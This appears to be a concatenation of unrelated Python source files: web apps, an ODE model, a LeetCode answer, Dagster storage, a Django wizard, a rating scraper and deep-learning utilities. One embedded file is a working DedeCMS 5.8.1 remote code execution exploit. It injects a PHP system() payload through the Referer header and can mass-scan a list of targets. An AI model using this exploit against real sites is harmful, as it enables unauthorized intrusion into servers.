    # and an empty result means "use the downloader's default format".
    format = video_format + "+" + audio_format
    format = format.strip("+")
    if not format:
      format = None
    directory = flask.g.client.download(address, format)
    flask.g.session.get_directories().add(directory)
    return flask.redirect(flask.url_for(".index"))
@bp.route("/restart", methods=["POST"])
def restart():
  """Ask the backend client process to exit (and presumably be restarted by
  its supervisor -- TODO confirm), then redirect to the index page."""
  with client.Client() as flask.g.client:
    flask.g.client.exit()
  return flask.redirect(flask.url_for(".index"))
# ---- dataset separator: jakub-vanik/youtube-ripper / http/ripper/main.py ----
# first order fluid-flow model based on the theory of planned behavior
from pylab import array, linspace
from scipy import integrate #for integrate.odeint
# setup logging
import logging
# Log everything to a file; the path is relative to the process working dir.
logging.basicConfig(filename='src/__logs/firstOrderModel2.log',\
                    level=logging.DEBUG,\
                    format='%(asctime)s %(levelname)s:%(message)s')
from .agent_defaultPersonality import agent as agentConstructor
#GLOBAL VARS:
agent = agentConstructor()  # personality parameters (beta, gamma, tau, theta)
samp = 2 #samples per time step used when integrating the ODEs
def fakeFunc(A, t):
    """Placeholder ODE right-hand side, used only to allocate the ETA arrays."""
    return -1.0
# Pre-allocate the five solution arrays (one per eta state variable); the
# placeholder odeint runs just reserve correctly-shaped storage.
ETA = [integrate.odeint(fakeFunc,[0,0],linspace(0,1,10)),\
       integrate.odeint(fakeFunc,[0,0],linspace(0,1,10)),\
       integrate.odeint(fakeFunc,[0,0],linspace(0,1,10)),\
       integrate.odeint(fakeFunc,[0,0],linspace(0,1,10)),\
       integrate.odeint(fakeFunc,[0,0],linspace(0,1,10))]
# XI is the current external-input function; getEta() replaces it per call.
XI = fakeFunc
def getEta(data,t,xi):
    """Return the five eta values at integer time t, integrating forward and
    caching each step into `data` as needed.

    :param data: cache list, one [eta0..eta4] entry per time step; mutated.
    :param t: integer time index requested.
    :param xi: external-input function; installed into the module-global XI.
    """
    global samp, ETA, time, agent, XI
    if t < len(data):
        return data[t]
    else:
        XI = xi # update input function from parameter
        if len(data) == 0:
            # Seed with the steady-state values at t=0.
            ETA0 = getInitialEta(agent.beta,agent.gamma,XI)
            data.append(ETA0[:])
        for T in range(len(data),t+1):
            # TODO: should this be samp*t so that accuracy is not lost far from 0???
            logging.info('solving ode @ t='+str(T)+', using '+str(samp)+' sub-samples')
            # NOTE(review): this assigns a module-global named `time`
            # (declared in the global statement above) -- confirm intended.
            time = linspace(0,T,samp) #(start,end,nSamples)
            etadot_0 = [0,0,0,0,0] #assumption of 1st order model
            #get arrays of data len=samp*t
            ETA[0] = integrate.odeint(eta1Func,[data[0][0],etadot_0[0]],time)
            ETA[1] = integrate.odeint(eta2Func,[data[0][1],etadot_0[1]],time)
            ETA[2] = integrate.odeint(eta3Func,[data[0][2],etadot_0[2]],time)
            ETA[3] = integrate.odeint(eta4Func,[data[0][3],etadot_0[3]],time)
            ETA[4] = integrate.odeint(eta5Func,[data[0][4],etadot_0[4]],time)
            logging.debug('len(result)='+str(len(ETA[0][:,0])))
            # restructure ETA using [eta#][time , eta_or_dEta] )
            E = [ETA[0][-1,0],\
                 ETA[1][-1,0],\
                 ETA[2][-1,0],\
                 ETA[3][-1,0],\
                 ETA[4][-1,0]]
            data.append(E)
        return data[t]
# === PRIVATE METHODS ===
def eta1Func(A,t):
    """ODE right-hand side for eta1: first-order lag of gamma[0,0]*xi_0
    with time constant tau[0] and input delay theta[0].

    A = [eta, etaDot]; only eta is used (first-order model).
    """
    #these come from calling function
    global XI, agent
    logging.debug( 'A='+str(A) )
    eta = A[0]
    etaDot=A[1]
    # logging.debug( '(agent.gamma*XI(t-agent.theta)-eta)/agent.tau' )
    # logging.debug( '('+str(agent.gamma[0,0])+'*'+str(XI(t-agent.theta[0])[0])+'-'+str(eta)+')/' + str(agent.tau[0]) + '=' )
    etaDDot= (agent.gamma[0,0]*XI(t-agent.theta[0])[0] - eta)/agent.tau[0]
    logging.debug( 'eta1etaDDot='+str(etaDDot) )
    return checkValue(etaDDot)
def eta2Func(A,t):
    """ODE right-hand side for eta2 (same lag form as eta1, channel 1)."""
    #these come from calling function
    global XI, agent
    eta = A[0]
    etaDot = A[1]
    etaDDot= (agent.gamma[1,1]*XI(t-agent.theta[1])[1] - eta)/agent.tau[1]
    return checkValue(etaDDot)
def eta3Func(A,t):
    """ODE right-hand side for eta3 (same lag form as eta1, channel 2)."""
    #these come from calling function
    global XI, agent
    eta = A[0]
    etaDot = A[1]
    etaDDot= (agent.gamma[2,2]*XI(t-agent.theta[2])[2] - eta)/agent.tau[2]
    return checkValue(etaDDot)
def eta4Func(A,t):
    """ODE right-hand side for eta4: lag of the beta-weighted sum of the
    (delayed) eta1..eta3 histories, time constant tau[3]."""
    #these come from calling function
    global agent
    eta = A[0]
    etaDot = A[1]
    etaDDot= ( agent.beta[3,0]*pastEta(t-agent.theta[3],0) \
               + agent.beta[3,1]*pastEta(t-agent.theta[4],1) \
               + agent.beta[3,2]*pastEta(t-agent.theta[5],2) \
               - eta)/agent.tau[3]
    return checkValue(etaDDot)
def eta5Func(A,t):
    """ODE right-hand side for eta5: lag of the beta-weighted sum of the
    (delayed) eta4 and eta3 histories, time constant tau[4]."""
    #these come from calling function
    global agent
    eta = A[0]
    etaDot = A[1]
    etaDDot= ( agent.beta[4,3]*pastEta(t-agent.theta[6],3) \
               + agent.beta[4,2]*pastEta(t-agent.theta[7],2) \
               - eta)/agent.tau[4]
    return checkValue(etaDDot)
# values cannot fall below 0! ... or can they?
def checkValue(v):
    """Pass the derivative through unchanged.

    An earlier clamp-to-zero was deliberately disabled; negative values are
    currently allowed.
    """
    return v
#finds initial eta values based on steady-state assumption
def getInitialEta(beta, gamma, xi):
    """Steady-state initial values for the five eta state variables at t=0."""
    inputs = xi(0)
    # eta0..eta2 respond directly to the external inputs.
    direct = [gamma[i, i] * inputs[i] for i in range(3)]
    # eta3 and eta4 are beta-weighted combinations of the upstream etas.
    eta3 = beta[3, 0] * direct[0] + beta[3, 1] * direct[1] + beta[3, 2] * direct[2]
    eta4 = beta[4, 3] * eta3 + beta[4, 2] * direct[2]
    return array(direct + [eta3, eta4])
#function to lookup a past eta (for time delays)
def pastEta(T,etaIndex):
    """Look up a previously integrated eta value at (possibly delayed) time T.

    :param T: continuous time; converted to an index via round(T/samp).
    :param etaIndex: which of the five eta variables to read.
    """
    global ETA, samp, agent, XI
    indexOfTime = int(round(T/samp))
    #logging.debug( T )
    if(indexOfTime<=0):
        # NOTE(review): this returns the whole 5-element steady-state array,
        # while the other branches return a scalar -- looks like it should be
        # getInitialEta(...)[etaIndex]; confirm.
        return getInitialEta(agent.beta,agent.gamma,XI);
    elif indexOfTime>=len(ETA[etaIndex][:,0]):
        # Requests beyond the integrated range clamp to the last sample.
        logging.error('attempted reference to future Eta')
        return ETA[etaIndex][-1,0]
    else:
        logging.debug( ' time:'+str(T) )
        logging.debug( 'index:'+str(indexOfTime) )
        logging.debug( '  len:'+str(len(ETA[etaIndex][:,0])) )
        logging.debug( 'value:'+str(ETA[etaIndex][indexOfTime,0]) ) #[eta#][time , eta_or_dEta] )
        return ETA[etaIndex][indexOfTime,0]
# ---- dataset separator: PIELab/behaviorSim / model_firstOrder.py ----
#
# @lc app=leetcode id=33 lang=python3
#
# [33] Search in Rotated Sorted Array
#
# https://leetcode.com/problems/search-in-rotated-sorted-array/description/
#
# algorithms
# Medium (35.70%)
# Likes: 6784
# Dislikes: 604
# Total Accepted: 902.2K
# Total Submissions: 2.5M
# Testcase Example: '[4,5,6,7,0,1,2]\n0'
#
# You are given an integer array nums sorted in ascending order (with distinct
# values), and an integer target.
#
# Suppose that nums is rotated at some pivot unknown to you beforehand (i.e.,
# [0,1,2,4,5,6,7] might become [4,5,6,7,0,1,2]).
#
# If target is found in the array return its index, otherwise, return -1.
#
#
# Example 1:
# Input: nums = [4,5,6,7,0,1,2], target = 0
# Output: 4
# Example 2:
# Input: nums = [4,5,6,7,0,1,2], target = 3
# Output: -1
# Example 3:
# Input: nums = [1], target = 0
# Output: -1
#
#
# Constraints:
#
#
# 1 <= nums.length <= 5000
# -10^4 <= nums[i] <= 10^4
# All values of nums are unique.
# nums is guaranteed to be rotated at some pivot.
# -10^4 <= target <= 10^4
#
#
#
# @lc code=start
class Solution:
    def search(self, nums: List[int], target: int) -> int:
        """Binary search in a rotated sorted array of distinct values.

        Returns the index of target, or -1 when it is absent.  O(log n).
        """
        if not nums:
            return -1
        lo, hi = 0, len(nums) - 1
        while lo + 1 < hi:
            mid = (lo + hi) // 2
            if nums[mid] == target:
                return mid
            if nums[mid] > nums[hi]:
                # Left half [lo..mid] is sorted; rotation point is to the right.
                if nums[lo] <= target < nums[mid]:
                    hi = mid
                else:
                    lo = mid
            else:
                # Right half [mid..hi] is sorted.
                if nums[mid] < target <= nums[hi]:
                    lo = mid
                else:
                    hi = mid
        if nums[lo] == target:
            return lo
        if nums[hi] == target:
            return hi
        return -1
# @lc code=end
# ---- dataset separator: Zhenye-Na/leetcode / 33.search-in-rotated-sorted-array.py ----
import os
from setuptools import setup
def read(fname):
    """Return the text of a file that sits next to this setup script.

    Fixes: the original leaked the file handle (`open(...).read()` with no
    close) and relied on the platform default encoding; the file is now
    closed via a context manager and decoded as UTF-8 explicitly.
    """
    with open(os.path.join(os.path.dirname(__file__), fname), encoding="utf-8") as fh:
        return fh.read()
# Parse requirements.txt into a plain dependency list: strip whitespace, drop
# blank lines, then drop comments and git+ VCS links (which pip's
# install_requires cannot express directly).
with open('requirements.txt') as fin:
    lines = fin.readlines()
    lines = [o.strip() for o in lines]
    lines = [o for o in lines if len(o) > 0]
    req = [o for o in lines if not o.startswith('#') and not o.startswith('git+')]
setup(
    name="resvit",
    version="0.1",
    author="Nghia Huynh",
    author_email="huynhnguyenhieunghia1999@gmail.com",
    description=("An package of Image Pretraining using U-Net architecture"),
    packages=['resvit'],
    long_description=read('README.md'),
    # Fix: requirements.txt was parsed into `req` above but never wired in,
    # so `pip install` would not pull the dependencies.
    install_requires=req,
)
71782650344 | #!/usr/bin/env python
# -*- conding:utf-8 -*-
import requests
import argparse
import sys
import urllib3
import re
from prettytable import PrettyTable
urllib3.disable_warnings()
def title():
print("""
Dedecms_5.8.1 代码执行漏洞
Use:python3 dedecms_5.8.1_RCE.py
Author: Henry4E36
Github:https://github.com/Henry4E36/dedecms_5.8.1_RCE
""")
class Information(object):
def __init__(self, args):
self.args = args
self.url = args.url
self.file = args.file
def target_url(self):
target_url = self.url + "/plus/flink.php?dopost=save"
headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0",
"Referer": '<?php "system"(id);?>'
}
try:
res = requests.get(url=target_url,headers=headers,verify=False,timeout=5)
if "uid" in res.text and res.status_code == 200:
pattern = re.compile(r"location='(.*)")
cmd_id = pattern.findall(res.text)[0]
return self.url, True, cmd_id
else:
return self.url, False, "NULL"
except Exception as e:
return self.url, "Error", e
def file_url(self):
file_results = []
with open(self.file, "r") as urls:
for url in urls:
url = url.strip()
if url[:4] != "http":
url = "http://" + url
self.url = url.strip()
result = Information.target_url(self)
file_results.append(result)
return file_results
if __name__ == "__main__":
title()
parser = argparse.ArgumentParser(description='Dedecms_5.8.1 代码执行漏洞')
parser.add_argument("-u", "--url", type=str, metavar="url", help="Target url eg:\"http://127.0.0.1\"")
parser.add_argument("-f", "--file", metavar="file", help="Targets in file eg:\"ip.txt\"")
args = parser.parse_args()
if len(sys.argv) != 3:
print(
"[-] 参数错误!\neg1:>>>python3 dedecms_5.8.1_RCE.py -u http://127.0.0.1\neg2:>>>python3 dedecms_5.8.1_RCE.py -f ip.txt")
elif args.url:
results = Information(args).target_url()
if results[1] is True:
print(f"\033[31m[{chr(8730)}] 目标系统: {results[-1]} 存在代码执行漏洞!\033[0m")
print(f"[{chr(8730)}] 响应为:{results[1]}")
elif results[1] is False:
print(f"[\033[31mx\033[0m] 目标系统: {results[-1]} 不存在代码执行漏洞!")
print("[" + "-" * 100 + "]")
elif results[1] == "Error":
print("[\033[31mX\033[0m] 连接错误!")
print("[" + "-"*100 + "]")
elif args.file:
results = Information(args).file_url()
k = 0
table = PrettyTable(['序号', '地址', '有无漏洞', '响应'])
for i in results:
if i[1] is True:
table.add_row([k+1, i[0], i[1], i[2]])
k = k + 1
elif i[1] is False:
table.add_row([k+1, i[0], i[1], i[2]])
k = k + 1
elif i[1] == "Error":
table.add_row([k+1, i[0], i[1], i[2]])
k = k + 1
print(table)
| Henry4E36/dedecms_5.8.1_RCE | dedecms_5.8.1_RCE.py | dedecms_5.8.1_RCE.py | py | 3,462 | python | en | code | 5 | github-code | 36 |
# -*- coding: utf-8 -*-
# @Time : 2019/9/10 11:21
# @Author : bjsasc
import json
import logging
import os
import sys
import time
import DataUtil
from pyinotify import WatchManager, Notifier, ProcessEvent, IN_CLOSE_WRITE
# Logging goes to two handlers: the console and a file.
log = logging.getLogger('file watch ---')
fp = logging.FileHandler('a.log', 'a+', encoding='utf-8')
fs = logging.StreamHandler()
log.addHandler(fs)
log.addHandler(fp)
log.setLevel(logging.DEBUG)
FILE_DIR = r'/home/bjsasc/test/' # directory being watched
def check_dir_exist():
    """
    Exit the process unless FILE_DIR is set and exists on disk.
    """
    if not FILE_DIR:
        log.info("The WATCH_PATH setting MUST be set.")
        sys.exit()
    else:
        if os.path.exists(FILE_DIR):
            log.info('Found watch path: path=%s.' % (FILE_DIR))
        else:
            log.info('The watch path NOT exists, watching stop now: path=%s.' % (FILE_DIR))
            sys.exit()
def read_json_from_file(file_path):
    """Load the JSON document at *file_path* and process each record.

    :param file_path: path of the JSON file (expected to hold a list)
    """
    with open(file_path) as fh:
        records = json.load(fh)
    # Hand every record to the processing pipeline.
    for record in records:
        data_process(record)
def data_process(data: dict):
    """
    Process one record parsed from the watched JSON file: derive file
    metadata, checksum the file, persist a record, copy the file, and
    notify a remote interface (all via the project DataUtil module).
    :param data: dict with at least a "file_path" key
    """
    file_path = data["file_path"]
    # Derive info from the file name.
    # NOTE(review): parse_name is assumed to return a 2-item sequence
    # (satellite info, payload info) -- confirm against DataUtil.
    name_info = DataUtil.parse_name(file_path)
    weixing_info = name_info[0]  # currently unused
    zaihe_info = name_info[1]  # currently unused
    # Open the file and compute its check number / checksum.
    checknum = DataUtil.check_file(file_path)
    # Build the dict that will be stored in the database.
    result = {}
    result['type'] = '1'
    result['name'] = file_path
    result['suffix'] = 'fits'  # hard-coded: every record is treated as a .fits file
    result['sourcepath'] = file_path
    result['checknum'] = checknum
    result['status'] = '1'
    # Persist the record to the database.
    DataUtil.save_data(result)
    # Copy the file.
    # NOTE(review): source and destination are the same path here --
    # verify whether a distinct destination path was intended.
    DataUtil.copy_file(file_path, file_path)
    # Refresh related data.
    DataUtil.update_date()
    # Call the remote notification interface.
    DataUtil.notice(file_path)
class EventHandler(ProcessEvent):
    """pyinotify handler that reacts when a file in the watched directory
    finishes being written (IN_CLOSE_WRITE is the only event handled)."""

    def process_IN_CLOSE_WRITE(self, event):
        """
        Handle the close-after-write event: read the finished file as
        JSON and process its records.
        :param event: pyinotify event carrying .path and .name
        """
        # logging.info("create file: %s " % os.path.join(event.path, event.name))
        file_path = os.path.join(event.path, event.name)
        # Small grace period in case the writer has not fully flushed yet.
        time.sleep(2)
        log.info('write file finished ...%s' % (file_path))
        read_json_from_file(file_path)
def main():
    """
    Entry point for the file watcher: verify the watch directory exists,
    then loop forever dispatching inotify events to EventHandler.
    """
    check_dir_exist()
    wm = WatchManager()
    notifier = Notifier(wm, EventHandler())
    # rec=True also watches subdirectories; auto_add picks up new ones.
    wm.add_watch(FILE_DIR, IN_CLOSE_WRITE, rec=True, auto_add=True)
    log.info('Now starting monitor %s' % (FILE_DIR))
    notifier.loop()  # blocks until interrupted
if __name__ == '__main__':
    main()
| xingyundeyangzhen/zxm | DataWatcher.py | DataWatcher.py | py | 2,812 | python | en | code | 0 | github-code | 36 |
495235347 | import glob
import os
import sqlite3
from collections import defaultdict
from contextlib import contextmanager
import six
import sqlalchemy as db
from sqlalchemy.pool import NullPool
from watchdog.events import PatternMatchingEventHandler
from watchdog.observers import Observer
from dagster import check
from dagster.core.serdes import ConfigurableClass, ConfigurableClassData
from dagster.utils import mkdir_p
from ...pipeline_run import PipelineRunStatus
from ...sql import (
create_engine,
get_alembic_config,
handle_schema_errors,
run_alembic_upgrade,
stamp_alembic_rev,
)
from ..base import DagsterEventLogInvalidForRun
from ..schema import SqlEventLogStorageMetadata
from ..sql_event_log import SqlEventLogStorage
class SqliteEventLogStorage(SqlEventLogStorage, ConfigurableClass):
    '''SQL event log storage backed by one SQLite database file per run,
    all kept under a single base directory.'''

    def __init__(self, base_dir, inst_data=None):
        '''Note that idempotent initialization of the SQLite database is done on a per-run_id
        basis in the body of connect, since each run is stored in a separate database.'''
        self._base_dir = os.path.abspath(check.str_param(base_dir, 'base_dir'))
        mkdir_p(self._base_dir)
        # run_id -> {callback: (watchdog handler, scheduled watch)}; lets
        # end_watch unhook one specific callback later.
        self._watchers = defaultdict(dict)
        self._obs = Observer()
        self._obs.start()
        self._inst_data = check.opt_inst_param(inst_data, 'inst_data', ConfigurableClassData)

    def upgrade(self):
        '''Run alembic migrations against every per-run database on disk.'''
        all_run_ids = self.get_all_run_ids()
        print(
            'Updating event log storage for {n_runs} runs on disk...'.format(
                n_runs=len(all_run_ids)
            )
        )
        alembic_config = get_alembic_config(__file__)
        for run_id in all_run_ids:
            with self.connect(run_id) as conn:
                run_alembic_upgrade(alembic_config, conn, run_id)

    @property
    def inst_data(self):
        return self._inst_data

    @classmethod
    def config_type(cls):
        return {'base_dir': str}

    @staticmethod
    def from_config_value(inst_data, config_value):
        return SqliteEventLogStorage(inst_data=inst_data, **config_value)

    def get_all_run_ids(self):
        '''Run ids are the stems of the *.db files in the base directory.'''
        all_filenames = glob.glob(os.path.join(self._base_dir, '*.db'))
        return [os.path.splitext(os.path.basename(filename))[0] for filename in all_filenames]

    def path_for_run_id(self, run_id):
        return os.path.join(self._base_dir, '{run_id}.db'.format(run_id=run_id))

    def conn_string_for_run_id(self, run_id):
        check.str_param(run_id, 'run_id')
        # Normalize OS-specific separators into the forward slashes sqlite URLs use.
        return 'sqlite:///{}'.format('/'.join(self.path_for_run_id(run_id).split(os.sep)))

    def _initdb(self, engine, run_id):
        '''Create the schema for a fresh per-run database and stamp its
        alembic revision; raises DagsterEventLogInvalidForRun on db errors.'''
        try:
            SqlEventLogStorageMetadata.create_all(engine)
            # WAL journal mode allows readers while a run is appending events.
            engine.execute('PRAGMA journal_mode=WAL;')
        except (db.exc.DatabaseError, sqlite3.DatabaseError) as exc:
            six.raise_from(DagsterEventLogInvalidForRun(run_id=run_id), exc)
        alembic_config = get_alembic_config(__file__)
        conn = engine.connect()
        try:
            stamp_alembic_rev(alembic_config, conn)
        finally:
            conn.close()

    @contextmanager
    def connect(self, run_id=None):
        '''Yield a connection to the run's database, creating and
        initializing the database file on first use.'''
        check.str_param(run_id, 'run_id')
        conn_string = self.conn_string_for_run_id(run_id)
        engine = create_engine(conn_string, poolclass=NullPool)
        if not os.path.exists(self.path_for_run_id(run_id)):
            self._initdb(engine, run_id)
        conn = engine.connect()
        try:
            with handle_schema_errors(
                conn,
                get_alembic_config(__file__),
                msg='SqliteEventLogStorage for run {run_id}'.format(run_id=run_id),
            ):
                yield conn
        finally:
            conn.close()

    def wipe(self):
        '''Delete every run database, including WAL / shared-memory sidecar files.'''
        for filename in (
            glob.glob(os.path.join(self._base_dir, '*.db'))
            + glob.glob(os.path.join(self._base_dir, '*.db-wal'))
            + glob.glob(os.path.join(self._base_dir, '*.db-shm'))
        ):
            os.unlink(filename)

    def watch(self, run_id, start_cursor, callback):
        '''Invoke *callback* for each new event appended to the run's log.'''
        watchdog = SqliteEventLogStorageWatchdog(self, run_id, callback, start_cursor)
        self._watchers[run_id][callback] = (
            watchdog,
            self._obs.schedule(watchdog, self._base_dir, True),
        )

    def end_watch(self, run_id, handler):
        '''Stop invoking *handler* for the run; no-op if it was not watching.'''
        if handler in self._watchers[run_id]:
            event_handler, watch = self._watchers[run_id][handler]
            self._obs.remove_handler_for_watch(event_handler, watch)
            del self._watchers[run_id][handler]
class SqliteEventLogStorageWatchdog(PatternMatchingEventHandler):
    '''Watches a single run's .db file and replays newly appended events
    to a callback.'''

    def __init__(self, event_log_storage, run_id, callback, start_cursor, **kwargs):
        self._event_log_storage = check.inst_param(
            event_log_storage, 'event_log_storage', SqliteEventLogStorage
        )
        self._run_id = check.str_param(run_id, 'run_id')
        self._cb = check.callable_param(callback, 'callback')
        self._log_path = event_log_storage.path_for_run_id(run_id)
        # -1 means "no events consumed yet"; the cursor counts delivered events.
        self._cursor = start_cursor if start_cursor is not None else -1
        super(SqliteEventLogStorageWatchdog, self).__init__(patterns=[self._log_path], **kwargs)

    def _process_log(self):
        '''Deliver any events appended since the cursor to the callback.'''
        events = self._event_log_storage.get_logs_for_run(self._run_id, self._cursor)
        self._cursor += len(events)
        for event in events:
            status = self._cb(event)
            # Once the run reaches a terminal state, stop watching it.
            if status == PipelineRunStatus.SUCCESS or status == PipelineRunStatus.FAILURE:
                self._event_log_storage.end_watch(self._run_id, self._cb)

    def on_modified(self, event):
        '''Filesystem-change hook; only our run's db file matches the pattern.'''
        check.invariant(event.src_path == self._log_path)
        self._process_log()
| helloworld/continuous-dagster | deploy/dagster_modules/dagster/dagster/core/storage/event_log/sqlite/sqlite_event_log.py | sqlite_event_log.py | py | 5,713 | python | en | code | 2 | github-code | 36 |
25852270022 | """Functions for dynamically loading modules and functions.
"""
import importlib
import os
__author__ = 'Hayden Metsky <hayden@mit.edu>'
def load_module_from_path(path):
    """Import and execute the Python module at *path*.

    Args:
        path: path to a .py file

    Returns:
        the executed module object (its top-level code has run)
    """
    abs_path = os.path.abspath(path)
    # The module is named after the file's stem (filename without extension).
    stem = os.path.splitext(os.path.basename(abs_path))[0]
    spec = importlib.util.spec_from_file_location(stem, abs_path)
    module = importlib.util.module_from_spec(spec)
    spec.loader.exec_module(module)
    return module
def load_function_from_path(path, fn_name):
    """Fetch the function named *fn_name* from the module at *path*.

    Args:
        path: path to a .py file
        fn_name: name of the function inside that module

    Returns:
        the Python function object

    Raises:
        Exception: the module does not define *fn_name*
    """
    loaded = load_module_from_path(path)
    try:
        return getattr(loaded, fn_name)
    except AttributeError:
        raise Exception(("Module at %s does not contain function %s" %
                         (path, fn_name)))
| broadinstitute/catch | catch/utils/dynamic_load.py | dynamic_load.py | py | 1,312 | python | en | code | 63 | github-code | 36 |
30586804681 | from django.contrib.formtools.wizard.views import SessionWizardView
from django.core.urlresolvers import reverse
from django.forms import modelformset_factory
from django.http import HttpResponseRedirect
from django.shortcuts import render, get_object_or_404
# Create your views here.
from recipe.forms import *
from recipe.models import Recipe
# Wizard step definitions: (step name, form/formset class). Each ingredient
# step is a model formset with 3 blank extra rows; the recipe FK is excluded
# because RecipeWizard.save_recipe assigns it after the Recipe is saved.
FORMS = [("recipe", RecipeForm),
         ("malt", modelformset_factory(MaltIL, formset=MaltFormSet, extra=3, exclude=["recipe"])),
         ("hops", modelformset_factory(HopsIL, formset=HopsFormSet, extra=3, exclude=["recipe"])),
         ("yeast", modelformset_factory(YeastIL, formset=YeastFormSet, extra=3, exclude=["recipe"]))]
class RecipeWizard(SessionWizardView):
    """Multi-step wizard that collects a recipe plus its malt/hops/yeast
    ingredient formsets and persists everything as one Recipe."""
    template_name = "recipe/recipe_wizard.html"

    def save_recipe(self, form_dict):
        """Save the Recipe, then attach every ingredient line to it.

        :param form_dict: wizard step name -> bound form/formset
        :return: the saved Recipe instance
        """
        recipe = form_dict['recipe'].save()
        # The three ingredient formsets are handled identically: defer the
        # DB write, point each line at the new recipe, then save it.
        for step in ('malt', 'hops', 'yeast'):
            for ingredient in form_dict[step].save(commit=False):
                ingredient.recipe = recipe
                ingredient.save()
        return recipe

    def done(self, form_list, form_dict, **kwargs):
        """Final wizard step: persist everything and redirect to the
        recipe detail page."""
        recipe = self.save_recipe(form_dict)
        return HttpResponseRedirect(reverse('view_recipe', args=[recipe.id]))
def view_recipe(request, recipe_id):
    """Render the detail page for one recipe; 404 when the id is unknown."""
    recipe = get_object_or_404(klass=Recipe, pk=recipe_id)
    context = {'recipe': recipe}
    return render(request, 'recipe/viewrecipe.html', context)
def view_all_recipes(request):
    """Render a listing of every recipe in the database."""
    context = {'recipes': Recipe.objects.all()}
    return render(request, 'recipe/viewallrecipes.html', context)
def brewmaster(request, recipe_id):
    """Render the brewmaster (brewing) view for one recipe; 404 if missing."""
    context = {'recipe': get_object_or_404(klass=Recipe, pk=recipe_id)}
    return render(request, 'recipe/brewmaster.html', context)
from urllib.request import urlopen

# Scrape the FIDE top-players page and look up one player's rating and rank.
edetabel = urlopen("https://ratings.fide.com/top.phtml?list=men")
baidid = edetabel.read()
tekst = baidid.decode()
# Prompts (in Estonian): first name, then surname of the chess player.
eesnimi = str(input("Sisestage malemängja eesnimi: ")).lower()
perenimi = str(input("Sisestage malemängja perekonnanimi: ")).lower()
# The page lists players as "Surname, Firstname".
otsitav = perenimi.title() + ", " + eesnimi.title()
algus = tekst.index(otsitav)
# Brittle screen-scraping: the rating is assumed to start 53 characters
# after the name and be exactly 4 digits -- TODO confirm this still
# matches the page's current HTML.
temp_algus = algus + 53 + len(otsitav)
elo = tekst[temp_algus:temp_algus+4]
# Rank estimate: each table row is assumed to occupy 225 characters,
# with the first row starting at offset 9266 -- presumably derived from
# the page layout; verify against the current page source.
i = 9266
rank = 0
while i < algus:
    i += 225
    rank += 1
print(elo)
print(rank)
40281118137 | import os
import time
import math
import numpy as np
import torch
import copy
from skimage import img_as_float32
import im_utils
from unet3d import UNet3D
from file_utils import ls
from torch.nn.functional import softmax
import torch.nn.functional as F
# One-entry model cache (see load_model): the last loaded model and its
# path, so repeated segmentations with the same model skip disk reads.
cached_model = None
cached_model_path = None
# Debug switch: when True, models are not moved to the GPU
# (see load_model / random_model / create_first_model_with_random_weights).
use_fake_cnn = False
def fake_cnn(tiles_for_gpu):
    """Debug stand-in for the network: threshold each tile's central
    region at its mean intensity (useful for checking tile layout etc)."""
    predictions = []
    for tile in tiles_for_gpu:
        core = tile[0, 17:-17, 17:-17, 17:-17].data.cpu().numpy()
        predictions.append((core > np.mean(core)).astype(np.int8))
    return np.array(predictions)
def get_latest_model_paths(model_dir, k):
    """Full paths of the *k* newest model files (names sort by number/time)."""
    newest_names = sorted(ls(model_dir))[-k:]
    return [os.path.join(model_dir, name) for name in newest_names]
def load_model(model_path, classes):
    """Load a UNet3D (wrapped in DataParallel) from *model_path*.

    A one-entry cache keyed on the path avoids re-reading the weights; a
    deep copy is returned so callers cannot mutate the cached model.
    """
    global cached_model
    global cached_model_path
    # using cache can save up to half a second per segmentation with network drives
    if model_path == cached_model_path:
        return copy.deepcopy(cached_model)
    # two channels as one is input image and another is some of the fg and bg annotation
    # each non-empty channel in the annotation is included with 50% chance.
    # Option1 - fg and bg will go in as seprate channels
    # so channels are [image, fg_annot, bg_annot]
    # Option2 -
    # when included both fg a bg go into the model bg is -1 and fg is +1. undefined is 0
    # Option 1 will be evaluated first (possibilty easier to implement)
    model = UNet3D(classes, im_channels=3)
    try:
        # Checkpoint saved from a bare module: load first, then wrap.
        model.load_state_dict(torch.load(model_path))
        model = torch.nn.DataParallel(model)
    # pylint: disable=broad-except, bare-except
    except:
        # Checkpoint saved from a DataParallel model ('module.'-prefixed
        # keys): wrap first so the key names line up, then load.
        model = torch.nn.DataParallel(model)
        model.load_state_dict(torch.load(model_path))
    if not use_fake_cnn:
        model.cuda()
    # store in cache, as the most frequent model is loaded often
    cached_model_path = model_path
    cached_model = model
    return copy.deepcopy(model)
def random_model(classes):
    """Build a freshly initialized (untrained) UNet3D wrapped in DataParallel."""
    # num out channels is twice number of channels
    # as we have a positive and negative output for each structure.
    model = UNet3D(classes, im_channels=3)
    model = torch.nn.DataParallel(model)
    if not use_fake_cnn:
        model.cuda()
    return model
def create_first_model_with_random_weights(model_dir, classes):
    """Create, save (as model number 1), and return a randomly initialized
    model; used when no model was specified on project creation."""
    model_num = 1
    model_name = str(model_num).zfill(6)
    model_name += '_' + str(int(round(time.time()))) + '.pkl'  # e.g. 000001_<epoch>.pkl
    model = random_model(classes)
    model_path = os.path.join(model_dir, model_name)
    torch.save(model.state_dict(), model_path)
    if not use_fake_cnn:
        # NOTE(review): random_model() already moved the model to the GPU
        # in this case, so this second .cuda() appears redundant (harmless).
        model.cuda()
    return model
def get_prev_model(model_dir, classes):
    """Load the most recently saved model; returns (model, path)."""
    latest_path = get_latest_model_paths(model_dir, k=1)[0]
    return load_model(latest_path, classes), latest_path
def save_if_better(model_dir, cur_model, prev_model_path, cur_dice, prev_dice):
    """Persist *cur_model* when its dice score beats the previous best.

    Returns True when the model was saved, False otherwise.
    """
    # NaN dice values cannot be compared, so coerce them to 0 first.
    cur_dice = 0 if math.isnan(cur_dice) else cur_dice
    prev_dice = 0 if math.isnan(prev_dice) else prev_dice
    print('Validation: prev dice', str(round(prev_dice, 5)).ljust(7, '0'),
          'cur dice', str(round(cur_dice, 5)).ljust(7, '0'))
    if cur_dice <= prev_dice:
        return False
    save_model(model_dir, cur_model, prev_model_path)
    return True
def save_model(model_dir, cur_model, prev_model_path):
    """Write cur_model's state dict under the next sequential model number."""
    # Model file names look like 000123_<epoch>.pkl; bump the number part.
    prev_num = int(os.path.basename(prev_model_path).split('_')[0])
    now = int(round(time.time()))
    model_name = str(prev_num + 1).zfill(6) + '_' + str(now) + '.pkl'
    model_path = os.path.join(model_dir, model_name)
    print('saving', model_path, time.strftime('%H:%M:%S', time.localtime(now)))
    torch.save(cur_model.state_dict(), model_path)
